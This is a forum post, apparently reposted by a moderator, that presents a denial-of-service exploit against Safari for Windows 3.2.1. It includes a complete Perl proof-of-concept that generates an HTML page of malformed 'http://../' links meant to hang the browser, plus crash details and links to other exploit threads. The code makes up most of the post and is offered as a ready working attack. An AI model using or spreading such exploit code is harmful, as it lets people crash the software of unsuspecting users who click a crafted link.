Safari for Windows 3.2.1 Remote http: URI handler DoS
Page 1 of 1
Safari for Windows 3.2.1 Remote http: URI handler DoS
A "malformed" http domain name , can cause that safari turn in
a infinite loop wen try to resolve this domain, and it can cause
at memory level a access violation wen try to write a secction
that contains unknow data.
See Safari_httpDoSPoc.pl file to demostrate it !
AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe
ModVer: 3.525.27.1 Offset: 00089394
################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC <br>(abc@mail.com) xyz.com</h3>
<P>This PoC is a malformed http URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href="http://../">Safari Die()</a> or this other =><a href="http://./">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;
############################################
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» Safari for windows Long link DoS
» Windows 7 / Server 2008R2 Remote Kernel Crash
» Windows live Messenger malformed file overflow DoS remote exploitation.
» Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Exploit
» Bonus Safari XXE (only affecting Safari 4 Beta)
» Windows 7 / Server 2008R2 Remote Kernel Crash
» Windows live Messenger malformed file overflow DoS remote exploitation.
» Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Exploit
» Bonus Safari XXE (only affecting Safari 4 Beta)
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|